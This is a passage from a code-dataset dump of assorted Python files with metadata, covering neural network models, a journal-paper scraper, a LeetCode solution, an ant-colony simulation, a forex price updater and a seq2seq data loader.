"attribute"}, {"api_name": "torch.nn.ReLU", "line_number": 51, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 51, "usage_type": "attribute"}, {"api_name": "torch.nn.MSELoss", "line_number": 59, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 59, "usage_type": "attribute"}, {"api_name": "torch.optim.SGD", "line_number": 60, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 60, "usage_type": "attribute"}, {"api_name": "visdom.Visdom", "line_number": 80, "usage_type": "call"}, {"api_name": "torch.arange", "line_number": 82, "usage_type": "call"}, {"api_name": "torch.sin", "line_number": 83, "usage_type": "call"}]}
+{"seq_id": "218641798", "text": "from model import Tower\nfrom utils import model_property\nimport tensorflow as tf\nimport tensorflow.contrib.slim as slim\nimport utils as digits\nfrom tensorflow.contrib.slim.python.slim.nets import resnet_v1\nfrom tensorflow.python.ops import array_ops\n\n\nclass UserModel(Tower):\n @model_property\n def inference(self):\n x = tf.reshape(self.x, shape=[-1, self.input_shape[0], self.input_shape[1], self.input_shape[2]])\n with slim.arg_scope(resnet_v1.resnet_arg_scope()):\n logits, end_points = resnet_v1.resnet_v1_50(x, num_classes=self.nclasses, is_training=self.is_training\n # , spatial_squeeze=True\n , global_pool=True\n )\n # remove in the future if squeeze build in resnet_v1 function\n net = array_ops.squeeze(logits, [1,2], name='SpatialSqueeze')\n return net\n\n @model_property\n def loss(self):\n model = self.inference\n loss = digits.classification_loss(model, self.y)\n acc_top1 = digits.classification_accuracy_top_n(model, self.y, 1)\n acc_top5 = digits.classification_accuracy_top_n(model, self.y, 5)\n self.summaries.append(tf.summary.scalar(acc_top1.op.name, acc_top1))\n self.summaries.append(tf.summary.scalar(acc_top5.op.name, acc_top5))\n return loss\n", "sub_path": "digits/standard-networks/tensorflow/resnet50_top5.py", "file_name": "resnet50_top5.py", "file_ext": "py", "file_size_in_byte": 1304, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "model.Tower", "line_number": 10, "usage_type": "name"}, {"api_name": "tensorflow.reshape", "line_number": 13, "usage_type": "call"}, {"api_name": "tensorflow.contrib.slim.arg_scope", "line_number": 14, "usage_type": "call"}, {"api_name": "tensorflow.contrib.slim", "line_number": 14, "usage_type": "name"}, {"api_name": "tensorflow.contrib.slim.python.slim.nets.resnet_v1.resnet_arg_scope", "line_number": 14, "usage_type": "call"}, {"api_name": "tensorflow.contrib.slim.python.slim.nets.resnet_v1", "line_number": 14, "usage_type": "name"}, {"api_name": "tensorflow.contrib.slim.python.slim.nets.resnet_v1.resnet_v1_50", "line_number": 15, "usage_type": "call"}, {"api_name": "tensorflow.contrib.slim.python.slim.nets.resnet_v1", "line_number": 15, "usage_type": "name"}, {"api_name": "tensorflow.python.ops.array_ops.squeeze", "line_number": 20, "usage_type": "call"}, {"api_name": "tensorflow.python.ops.array_ops", "line_number": 20, "usage_type": "name"}, {"api_name": "utils.model_property", "line_number": 11, "usage_type": "name"}, {"api_name": "utils.classification_loss", "line_number": 26, "usage_type": "call"}, {"api_name": "utils.classification_accuracy_top_n", "line_number": 27, "usage_type": "call"}, {"api_name": "utils.classification_accuracy_top_n", "line_number": 28, "usage_type": "call"}, {"api_name": "tensorflow.summary.scalar", "line_number": 29, "usage_type": "call"}, {"api_name": "tensorflow.summary", "line_number": 29, "usage_type": "attribute"}, {"api_name": "tensorflow.summary.scalar", "line_number": 30, "usage_type": "call"}, {"api_name": "tensorflow.summary", "line_number": 30, "usage_type": "attribute"}, {"api_name": "utils.model_property", "line_number": 23, "usage_type": "name"}]}
+{"seq_id": "88871342", "text": "import torch\nimport torch.nn as nn\nimport torchvision\n\nclass DenseBlock(nn.Module):\n def __init__(self, input_shape, outdim):\n super(DenseBlock, self).__init__()\n \n in_shape = input_shape\n self.outdim = outdim\n self.bn0 = nn.BatchNorm2d(in_shape)\n self.relu0 = nn.ReLU()\n \n self.conv1 = nn.Conv2d(in_shape, outdim, kernel_size=3, \n stride=1, padding=1) \n self.bn1 = nn.BatchNorm2d(outdim*2)\n self.relu1 = nn.ReLU()\n \n self.conv2 = nn.Conv2d(2*outdim, outdim, 3, 1, 1)\n self.relu2 = nn.ReLU()\n self.shortCNN = nn.Conv2d(in_shape, outdim, 3, 1, 1)\n #self.bn2 = nn.BatchNorm2d()\n \n def forward(self, x):\n pre_norm = self.relu0(self.bn0(x))\n conv1 = self.conv1(pre_norm)\n \n in_shape = x.shape[1]\n if in_shape != self.outdim:\n shortcut = self.shortCNN(x)\n else:\n shortcut = x\n \n result1 = torch.cat([conv1, shortcut], 1)\n \n bn1 = self.bn1(result1)\n relu1 = self.relu1(bn1)\n \n conv2 = self.conv2(relu1)\n result2 = torch.cat([conv2, result1, shortcut], 1)\n return self.relu2(result2)\n \nclass Dense_UNet(nn.Module):\n def __init__(self, in_shape):\n super(Dense_UNet, self).__init__()\n self.conv0 = nn.Conv2d(in_shape, 32, 3, 1, 1)\n self.bn0 = nn.BatchNorm2d(32)\n self.relu0 = nn.ReLU()\n \n self.Dense1 = DenseBlock(32, 32)#32*4\n self.max_pool1 = nn.MaxPool2d(3, stride=2, padding=1)\n \n self.Dense2 = DenseBlock(32*4, 64)#64*4\n self.max_pool2 = nn.MaxPool2d(3, stride=2, padding=1)\n \n self.Dense3 = DenseBlock(64*4, 64)#64*4\n self.max_pool3 = nn.MaxPool2d(3, stride=2, padding=1)\n \n self.Dense4 = DenseBlock(64*4, 64)\n \n self.up1 = nn.ConvTranspose2d(64*4, 64, 3, stride=2, padding=1,\n output_padding=1)#cat1, conv3\n \n self.Dense5 = DenseBlock(64*4+64, 64)\n self.up2 = nn.ConvTranspose2d(64*4, 64, 3, stride=2, padding=1,\n output_padding=1)#cat2, conv2\n \n self.Dense6 = DenseBlock(64*4+64, 64)\n self.up3 = nn.ConvTranspose2d(64*4, 32, 3, stride=2, padding=1,\n output_padding=1)#cat3, conv1\n \n self.Dense7 = DenseBlock(32*4+32, 32)\n self.conv8 = nn.Conv2d(32*4, 1, kernel_size=1)\n self.relu8 = nn.ReLU()\n \n def forward(self, x):\n conv0 = self.conv0(x)\n conv0 = self.bn0(conv0)\n conv0 = self.relu0(conv0)\n \n conv1 = self.Dense1(conv0)\n pool1 = self.max_pool1(conv1)\n \n conv2 = self.Dense2(pool1)\n pool2 = self.max_pool2(conv2)\n \n conv3 = self.Dense3(pool2)\n pool3 = self.max_pool3(conv3)\n \n conv4 = self.Dense4(pool3)\n \n up1 = self.up1(conv4)\n cat1 = torch.cat([up1, conv3], 1)\n \n conv5 = self.Dense5(cat1)\n up2 = self.up2(conv5)\n \n cat2 = torch.cat([up2, conv2], 1)\n conv6 = self.Dense6(cat2)\n \n up3 = self.up3(conv6)\n cat3 = torch.cat([up3, conv1], 1)\n \n conv7 = self.Dense7(cat3)\n conv8 = self.conv8(conv7)\n \n return conv8", "sub_path": "models/DUNet.py", "file_name": "DUNet.py", "file_ext": "py", "file_size_in_byte": 3424, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "torch.nn.Module", "line_number": 5, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 5, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 11, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 11, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 12, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 12, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 14, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 14, "usage_type": "name"}, {"api_name": 
"torch.nn.BatchNorm2d", "line_number": 16, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 16, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 17, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 17, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 19, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 19, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 20, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 20, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 21, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 21, "usage_type": "name"}, {"api_name": "torch.cat", "line_number": 34, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 40, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 43, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 43, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 46, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 46, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 47, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 47, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 48, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 48, "usage_type": "name"}, {"api_name": "torch.nn.MaxPool2d", "line_number": 51, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 51, "usage_type": "name"}, {"api_name": "torch.nn.MaxPool2d", "line_number": 54, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 54, "usage_type": "name"}, {"api_name": "torch.nn.MaxPool2d", "line_number": 57, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 57, "usage_type": "name"}, {"api_name": "torch.nn.ConvTranspose2d", "line_number": 61, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 61, "usage_type": "name"}, {"api_name": "torch.nn.ConvTranspose2d", "line_number": 65, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 65, "usage_type": "name"}, {"api_name": "torch.nn.ConvTranspose2d", "line_number": 69, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 69, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 73, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 73, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 74, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 74, "usage_type": "name"}, {"api_name": "torch.cat", "line_number": 93, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 98, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 102, "usage_type": "call"}]}
+{"seq_id": "41682351", "text": "import io\nimport os.path\nfrom setuptools import find_packages, setup\n\nversion = '0.0.1-alpha'\n\ndef parse_requirements(filename):\n ''' load requirements from a pip requirements file'''\n lineiter = (line.strip() for line in open(filename))\n return [line for line in lineiter if line and not line.startswith('#')]\n\nwith io.open('README.md', 'rt', encoding='utf8') as f:\n readme = f.read()\n\nreqs = parse_requirements(os.path.join(os.path.dirname(__file__), 'requirements.txt'))\n\nsetup(\n name='strivial',\n version=version,\n author='Sean Watson',\n url='https://github.com/watsosc/strivial',\n license='Apache',\n description='Does some strava stuff',\n long_description=readme,\n packages=find_packages(),\n include_package_data=True,\n zip_safe=False,\n install_requires=reqs,\n extras_require={\n 'test': [\n 'pytest',\n 'coverage',\n ]\n }\n)", "sub_path": "setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 912, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "io.open", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path.path.join", "line_number": 15, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 15, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 15, "usage_type": "name"}, {"api_name": "os.path.path.dirname", "line_number": 15, "usage_type": "call"}, {"api_name": "setuptools.setup", "line_number": 17, "usage_type": "call"}, {"api_name": "setuptools.find_packages", "line_number": 25, "usage_type": "call"}]}
+{"seq_id": "645416200", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Sep 4 14:19:45 2018\r\n\r\n@author: Wei.l.c\r\n\"\"\"\r\n\r\nfrom getHtml import getHtml\r\nfrom getPaper import getPapers_geo,getPaper_geo\r\nfrom chkDir import chkData_geo\r\nfrom lxml import etree\r\nimport re\r\nimport pandas as pd\r\n\r\ncur_url='http://www.progeophys.cn/CN/1004-2903/current'\r\nmain_url='http://www.progeophys.cn/CN/1004-2903/home.shtml'\r\nbash_url='http://www.progeophys.cn/CN/volumn/volumn_'\r\nbashurl='.shtml'\r\ndown_url='http://www.progeophys.cn/CN/article/downloadArticleFile.do?attachType=PDF&id='\r\nsave_url=r'D:\\Paper\\中国地球物理学进展'\r\nsave_name='geo.csv'\r\n\r\ndef getPapers(url,spath,i,geo,total,fcreate=False):\r\n html=getHtml(url,0)\r\n \r\n burl=[]\r\n\r\n reg=''\r\n biaoti=re.findall(reg,html)\r\n reg=''+'(.*?)'+'
'\r\n    zuozhe=re.findall(reg,html)\r\n    \r\n    html=etree.HTML(html)\r\n    chuban=html.xpath('//div[@class=\"chuban\"]/span/text()')\r\n#    biaoti=html.xpath('//li/div[@class=\"biaoti\"]/a/text()')  # may contain special characters\r\n#    zuozhe=html.xpath('//li/div[@class=\"zuozhe\"]/text()')   # may contain empty values\r\n    jianjie=html.xpath('//li/div[@class=\"jianjie\"]/text()')\r\n    downcount=html.xpath('//li/div/span/b/text()')\r\n    \r\n    tmp=chuban[1].split(' ')\r\n    tmp=tmp[1]   # publication date\r\n    \r\n    geo, fcreate=chkData_geo(geo, fcreate)    \r\n    geo, total=getPaper_geo(geo, spath+'\\\\'+save_name, spath, burl, biaoti, total, i, tmp, zuozhe, jianjie, downurl, downcount)\r\n    \r\n    return geo, fcreate, total\r\n    \r\n    \r\ndef getPapers_all(spath=save_url,spage=0,fcreate=False):\r\n    papers=getPapers_geo(main_url)\r\n    papers.sort()\r\n    for i in papers:\r\n        print(i)\r\n    \r\n    if fcreate:\r\n        geo=[]\r\n        total=0\r\n    else:\r\n        geo=pd.read_csv(spath+'\\\\'+save_name,encoding='gbk')\r\n        total=geo.shape[0]\r\n\r\n#    for i in range(233,234):    #(1,150)\r\n    for i in papers:\r\n        if int(i) len(s):\n            return 0\n        c = Counter(s)\n        for i, letter in enumerate(s):\n            if c[letter] < k:\n                leftLength = self.longestSubstring(s[:i], k)\n                rightLength = self.longestSubstring(s[i+1:], k)\n                return max(leftLength, rightLength)\n            # break\n        # else:\n        return len(s)\n        # return max(leftLength, rightLength)\n\n\n        \"\"\" \n        # solution 3 recursive \n        res = 0 \n        if not s or len(s) < k:\n            return res \n        for c in set(s):\n            if s.count(c) < k:\n                return max(self.longestSubstring(z, k) for z in s.split(c))\n        # if every char in s appears >= k times, then the whole string is OK \n        return len(s)\n        \"\"\"\n        ", "sub_path": "Medium/LC395.py", "file_name": "LC395.py", "file_ext": "py", "file_size_in_byte": 2180, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "collections.Counter", "line_number": 44, "usage_type": "call"}]}
+{"seq_id": "33872290", "text": "from mesa import Model\nfrom mesa.space import MultiGrid\nfrom mesa.time import RandomActivation\nfrom AntAgents import *\nfrom AphidAgents import *\nfrom uuid import uuid4\nimport numpy as np\nfrom mesa.datacollection import DataCollector\nfrom DataCollection import ant_state_collector\nimport json\n\n\nclass AntModel(Model):\n def __init__(self, num_ln, num_fj, num_mk_col, num_ft_col, width, height):\n \"\"\"\n :param num_ln: Number of L. Niger agents\n :param num_fj: Number of F. Japonica agents\n :param num_mk_col: Number of M. Kuricola colonies\n :param num_ft_col: Number of F. Tropicalis colonies\n :param width: Width of the model grid\n :param height: Height of the model grid\n \"\"\"\n super().__init__()\n self.num_ln = num_ln\n self.num_fj = num_fj\n self.num_mk_col = num_mk_col\n self.num_ft_col = num_ft_col\n self.grid = MultiGrid(width, height, True)\n self.schedule = RandomActivation(self)\n self.running = True\n\n for h in range(self.num_fj):\n ant = FJaponica(uuid4(), self)\n self.schedule.add(ant)\n self.grid.place_agent(ant, self.grid.find_empty())\n\n for j in range(self.num_mk_col):\n colony = MKuricolaColony(uuid4(), self)\n self.schedule.add(colony)\n self.grid.place_agent(colony, self.grid.find_empty())\n\n for k in range(self.num_ft_col):\n colony = FTropicalisColony(uuid4(), self)\n self.schedule.add(colony)\n self.grid.place_agent(colony, self.grid.find_empty())\n\n for i in range(self.num_ln):\n ant = LNiger(uuid4(), self)\n self.schedule.add(ant)\n self.grid.place_agent(ant, self.grid.find_empty())\n ant._init_post_place()\n\n self.data_collector = DataCollector(model_reporters={},\n agent_reporters={\"states\": ant_state_collector})\n self.weights_dict = json.load(open(\"newout.json\",\"r\"))\n\n def drop_pheromone(self, location):\n \"\"\"\n Drops a LNPheromone object at the given location if one does not already exist. If one does already exist,\n 1 is added to the existing object's 'tracks' field.\n :param location: An (x, y) tuple detailing the location to drop the pheromone.\n :return: None\n \"\"\"\n if not self.is_pheromone_in_cell(location):\n self.grid.place_agent(LNPheromone(uuid4(), self), location)\n else:\n self.get_pheromone_in_cell(location).tracks += 1\n\n def is_pheromone_in_cell(self, location):\n \"\"\"\n Determines if a pheromone already exists in a given cell.\n :param location: The location to check.\n :return: boolean\n \"\"\"\n return True in [type(x) == LNPheromone for x in self.grid.get_cell_list_contents(location)]\n\n def is_ant_in_cell(self, location):\n \"\"\"\n Determines whether an ant exists in a given cell.\n :param location: The location to check.\n :return: boolean\n \"\"\"\n return True in [isinstance(x, Ant) for x in self.grid.get_cell_list_contents(location)]\n\n def is_colony_in_cell(self, location):\n \"\"\"\n Determines whether an aphid colony exists in a given cell.\n :param location: The location to check.\n :return: boolean\n \"\"\"\n return True in [type(x) == MKuricolaColony or type(x) == FTropicalisColony\n for x in self.grid.get_cell_list_contents(location)]\n\n def get_pheromone_in_cell(self, location):\n \"\"\"\n Returns a LNPheromone object from a cell. 
Assumes the cell has already been proven to have a pheromone object\n        in it.\n        :param location: The cell location to check.\n        :return: The LNPheromone object within the cell.\n        \"\"\"\n        in_cell_pheromone = None\n        for i in self.grid.get_cell_list_contents(location):\n            if type(i) == LNPheromone:\n                in_cell_pheromone = i\n        return in_cell_pheromone\n\n    def get_closest_agent_of_type(self, agent, agent_type):\n        \"\"\"\n        Gets the closest agent (besides self) of type agent_type. Returns -1 if it cannot find one.\n        :param agent: The agent to find the closest agent_type to.\n        :param agent_type: The type of the agent we are looking for.\n        :return:\n        \"\"\"\n        for radius in range(1, self.grid.width):\n            for neighbor in self.grid.get_neighbors(pos=agent.pos, moore=True, include_center=False, radius=radius):\n                if isinstance(neighbor, agent_type):\n                    return neighbor\n        return -1\n\n    def get_closest_colony(self, agent):\n        \"\"\"\n        Gets the closest colony to an agent. If an agent is of type colony, it returns itself.\n        :param agent: The agent to find the closest colony to.\n        :return: The closest colony or -1 if not found.\n        \"\"\"\n        return self.get_closest_agent_of_type(agent, Colony)\n\n    @staticmethod\n    def distance_between_cells(location_a, location_b):\n        \"\"\"\n        Calculates the distance between two cells on the grid.\n        :param location_a: First cell location.\n        :param location_b: Second cell location.\n        :return:\n        \"\"\"\n        return np.sqrt((location_a[0] - location_b[0])**2 + (location_a[1] - location_b[1])**2)\n\n    def get_nearest_cell_to_goal(self, goal_cell, possible_cells):\n        \"\"\"\n        Returns the cell from a list of possible cells which is closest to the end location.\n        :param goal_cell: The goal cell of the agent\n        :param possible_cells: Candidate cells.\n        :return: The location of the closest cell to the goal cell.\n        \"\"\"\n        closest_neighbor_index = -1\n        closest_neighbor_distance = np.inf\n        for i in range(0, len(possible_cells)):\n            dist = self.distance_between_cells(possible_cells[i], goal_cell)\n            if dist < closest_neighbor_distance:\n                closest_neighbor_index = i\n                closest_neighbor_distance = dist\n        return possible_cells[closest_neighbor_index]\n\n    def get_number_of_agents_in_radius(self, location, radius, agent_type):\n        \"\"\"\n        Returns the number of agents of type agent_type within a radius (not including center) of location.\n        :param location: Location to search around.\n        :param radius: Radius to search.\n        :param agent_type: Type of agent to search for.\n        :return: int\n        \"\"\"\n        total_agents = 0\n        for neighbor in self.grid.get_neighbors(pos=location, moore=True, include_center=False, radius=radius):\n            if isinstance(neighbor, agent_type):\n                total_agents += 1\n        return total_agents\n\n    def get_all_of_agent_type(self, agent_type):\n        \"\"\"\n        Returns all instances of agents of type agent_type in the Grid.\n        :param agent_type: The type of agent to find.\n        :return: A list of agent objects.\n        \"\"\"\n        return [x for x in self.grid.get_neighbors(pos=(0,0), moore=True, include_center=True, radius=self.grid.width)\n                if isinstance(x, agent_type)]\n\n    def step(self):\n        \"\"\"\n        A method called on every step of the model.\n        :return: None\n        \"\"\"\n        self.data_collector.collect(self)\n        self.schedule.step()\n", "sub_path": "AntModel.py", "file_name": "AntModel.py", "file_ext": "py", "file_size_in_byte": 7360, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "mesa.Model", "line_number": 13, "usage_type": "name"}, {"api_name": "mesa.space.MultiGrid",
"line_number": 28, "usage_type": "call"}, {"api_name": "mesa.time.RandomActivation", "line_number": 29, "usage_type": "call"}, {"api_name": "uuid.uuid4", "line_number": 33, "usage_type": "call"}, {"api_name": "uuid.uuid4", "line_number": 38, "usage_type": "call"}, {"api_name": "uuid.uuid4", "line_number": 43, "usage_type": "call"}, {"api_name": "uuid.uuid4", "line_number": 48, "usage_type": "call"}, {"api_name": "mesa.datacollection.DataCollector", "line_number": 53, "usage_type": "call"}, {"api_name": "DataCollection.ant_state_collector", "line_number": 54, "usage_type": "name"}, {"api_name": "json.load", "line_number": 55, "usage_type": "call"}, {"api_name": "uuid.uuid4", "line_number": 65, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 136, "usage_type": "call"}, {"api_name": "numpy.inf", "line_number": 146, "usage_type": "attribute"}]}
+{"seq_id": "556645579", "text": "import asyncio\nfrom decimal import Decimal\nimport time\nimport os\nimport traceback\nfrom urllib import request\n\nimport asyncpg\nimport asyncio_redis\nimport simplejson as json\n\n\nclass AssetsUpdate():\n def __init__(self):\n self.redis = None\n self.db = None\n self.assets = dict()\n\n async def redis_connect(self):\n \"\"\"!Connecting to redis server\"\"\"\n if self.redis is None:\n redis_host = os.environ.get('REDIS_HOST', 'localhost')\n self.redis = await asyncio_redis.Connection.create(host=redis_host, port=6379, db=1)\n\n async def db_connect(self):\n \"\"\"!Connecting to database\"\"\"\n if self.db is None:\n self.db = await asyncpg.connect(user=os.environ['POSTGRES_DB_USER'],\n password=os.environ['POSTGRES_DB_PASS'],\n database=os.environ['POSTGRES_DB_NAME'],\n host=os.environ['POSTGRES_DB_HOST'],\n port=os.environ['POSTGRES_DB_PORT'])\n\n async def update_assets(self):\n \"\"\"!Updating assets from db\"\"\"\n res = await self.db.fetch('SELECT id, symbol FROM assets')\n self.assets = {x['symbol']: x['id'] for x in res}\n\n async def add_db_asset_history(self, asset_id, timestamp, value):\n \"\"\"!Adding asset history into database\n @param asset_id id of asset\n @param timestamp unixtime of when value received\n @param value decimal value of current asset\"\"\"\n await self.db.execute('''INSERT INTO asset_history (asset_id, timestamp, value) VALUES ($1, $2, $3)''',\n asset_id, timestamp, value)\n\n async def publish_update(self, asset_name, asset_id, timestamp, value):\n \"\"\"!Publishing record about asset into current asset redis channel\n @param asset_name symbol of asset\n @param asset_id id of asset\n @param timestamp unixtime of when value received\n @param value decimal value of current asset\"\"\"\n redis_prefix = os.environ.get('REDIS_PREFIX', '')\n data = json.dumps(dict(assetName=asset_name, time=timestamp, assetId=asset_id, value=value))\n await self.redis.publish('%sasset_data_%s' % (redis_prefix, asset_id), data)\n\n def get_assets_data(self):\n \"\"\"!Loading assed data from forex trading\n @return parsed data containing information about all assets\"\"\"\n data = request.urlopen('https://ratesjson.fxcm.com/DataDisplayer').read().strip()\n asset_data = json.loads(data.replace(b',}', b'}')[5:-2])\n return asset_data\n\n async def parse_data(self, asset_data, timestamp):\n \"\"\"Filtering assets data to take only reqired assets, calculating it and sending into assets channels\n @param asset_data parsed assets data received from forex trading\n @param timestamp unixtime of when assets data received\"\"\"\n for item in asset_data['Rates']:\n if item['Symbol'] in self.assets.keys():\n value = (Decimal(item['Bid']) + Decimal(item['Ask'])) / 2\n await self.publish_update(item['Symbol'], self.assets[item['Symbol']], timestamp, value)\n await self.add_db_asset_history(self.assets[item['Symbol']], timestamp, value)\n\n async def run(self):\n await self.redis_connect()\n await self.db_connect()\n timestamp = None\n while True:\n try:\n if int(time.time()) == timestamp:\n continue\n timestamp = int(time.time())\n await self.update_assets()\n asset_data = self.get_assets_data()\n await self.parse_data(asset_data, timestamp)\n await asyncio.sleep(0.1)\n except Exception:\n traceback.print_exc()\n\n\nif __name__ == '__main__':\n app = AssetsUpdate()\n loop = asyncio.get_event_loop()\n loop.run_until_complete(app.run())\n loop.close()\n", "sub_path": "testwsapp/asset_update_script.py", "file_name": "asset_update_script.py", "file_ext": "py", 
"file_size_in_byte": 4002, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "os.environ.get", "line_number": 22, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 22, "usage_type": "attribute"}, {"api_name": "asyncio_redis.Connection.create", "line_number": 23, "usage_type": "call"}, {"api_name": "asyncio_redis.Connection", "line_number": 23, "usage_type": "attribute"}, {"api_name": "asyncpg.connect", "line_number": 28, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 28, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 29, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 30, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 31, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 32, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 53, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 53, "usage_type": "attribute"}, {"api_name": "simplejson.dumps", "line_number": 54, "usage_type": "call"}, {"api_name": "urllib.request.urlopen", "line_number": 60, "usage_type": "call"}, {"api_name": "urllib.request", "line_number": 60, "usage_type": "name"}, {"api_name": "simplejson.loads", "line_number": 61, "usage_type": "call"}, {"api_name": "decimal.Decimal", "line_number": 70, "usage_type": "call"}, {"api_name": "time.time", "line_number": 80, "usage_type": "call"}, {"api_name": "time.time", "line_number": 82, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 86, "usage_type": "call"}, {"api_name": "traceback.print_exc", "line_number": 88, "usage_type": "call"}, {"api_name": "asyncio.get_event_loop", "line_number": 93, "usage_type": "call"}]}
+{"seq_id": "364254253", "text": "from __future__ import unicode_literals,print_function,division\nfrom io import open\nimport unicodedata\nimport string\nimport re\nimport random\nimport torch\ndevice=torch.device(\"cuda\"if torch.cuda.is_available() else 'cpu')\n# device=torch.device('cpu')\nSOS_token=0\nEOS_token=1\n\nclass Lang:\n def __init__(self,name):\n '''\n\n :param name: 语言的名字\n '''\n self.name=name\n self.word2index={}\n self.word2count={}\n self.index2word={0:\"SOS\",1:'EOS'}\n self.n_words=2 # count SOS and EOS\n\n def addSentence(self,sentence):\n for word in sentence.split(' '):\n self.addWord(word)\n\n def addWord(self,word):\n if word not in self.word2index:\n self.word2index[word]=self.n_words\n self.word2count[word]=1\n self.index2word[self.n_words]=word\n self.n_words+=1\n else:\n self.word2count[word]+=1\n\n# Turn a unicode string to plain ASCii\ndef unicodeToAscii(s):\n return ''.join(\n c for c in unicodedata.normalize('NFD',s)\n if unicodedata.category(c)!='Mn'\n )\n\n# 变小写,strip,移除非字母以及非.?!符号,同时对.?!进行替换为' .'或' ?'或' !'\ndef normalizeString(s):\n # strip([chars]):移除字符串头尾指定的字符序列(chars)\n s=unicodeToAscii(s.lower().strip())\n s = re.sub(r\"([.!?])\", r\" \\1\", s)\n s = re.sub(r\"[^a-zA-Z.!?]+\", r\" \", s)\n # [.!?]匹配里面的字符 \\1表示反向引用(从左往右数第一个左括号对应的内容)\n # [^m]匹配除m以外的字符 +表示一次或多次匹配\n # re.sub(pattern,repl,s) 根据给出的pattern在s中匹配并替换\n return s\n\n# s='I ... am test??##'\n# s = re.sub(r\"([.!?])\", r\" \\1\", s)\n# print(s) #I . . . am test ? ?##\n# s = re.sub(r\"[^a-zA-Z.!?]+\", r\" \", s)\n# print(s) #I . . . am test ? ?\n\n'''\n1.readlangs():\nread data file,split into lines,split lines into pairs,and make lang instance ,normalize\n2.filterPairs():\nfilter by length and content\n3.lang.add_sentence\nmake word lists from sentences in pairs\n'''\ndef readLangs(lang1,lang2,reverse=False):\n print(\"Reading lines...\")\n\n # read file and split into lines\n lines=open('../data/%s-%s.txt'%(lang1,lang2),encoding='utf-8').\\\n read().strip().split('\\n')\n\n # split every line into pairs and normalize\n pairs=[[normalizeString(s) for s in l.split('\\t')]for l in lines]\n\n # make lang instance\n if reverse:\n pairs=[list(reversed(p)) for p in pairs]\n input_lang=Lang(lang1)\n output_lang=Lang(lang2)\n else:\n input_lang=Lang(lang1)\n output_lang=Lang(lang2)\n return input_lang,output_lang,pairs\n\nMAX_LENGTH=10\neng_prefixes = (\n \"i am \", \"i m \",\n \"he is\", \"he s \",\n \"she is\", \"she s \",\n \"you are\", \"you re \",\n \"we are\", \"we re \",\n \"they are\", \"they re \"\n)\n\ndef filterPair(p):\n return len(p[0].split(' ')) str:\n time_lower, time_higher = time\n language_query = \"\" if self.selected_language is None else (\"+language:\" + self.selected_language)\n\n query_build_str = ['q=created:\\\"%s+..+%s\\\"%s' % (time_lower, time_higher, language_query)]\n query_build_str.append('per_page=100')\n\n # If sort type is default then we should query with updated\n # as 'default' is CUSTOM type not supported by Octopus API\n query_build_str.append('sort=%s' % ('updated' if self.sort_type == 'default' else self.sort_type))\n\n return '?' 
